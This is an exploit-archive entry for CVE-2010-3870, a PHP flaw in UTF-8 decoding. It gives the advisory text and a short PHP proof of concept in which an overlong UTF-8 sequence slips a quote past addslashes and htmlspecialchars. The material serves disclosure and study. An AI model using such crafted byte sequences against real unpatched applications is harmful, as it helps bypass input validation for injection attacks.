[] NeoSense

PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation

Author: root@80sec.com
type: remote
platform: php
port: 
date_added: 2009-05-11 
date_updated: 2014-10-13 
verified: 1 
codes: CVE-2010-3870;OSVDB-69230 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/44605/info

PHP is prone to a vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow attackers to provide unexpected input and possibly bypass input-validation protection mechanisms. This can aid in further attacks that may utilize crafted user-supplied input.

Versions prior to PHP 5.3.4 are vulnerable.

<?php
$ill=chr(0xf0).chr(0xc0).chr(0xc0).chr(0xa7);
$ill=addslashes($ill);
echo utf8_decode("$ill");
echo htmlspecialchars ($ill,ENT_QUOTES,"utf-8" );
?>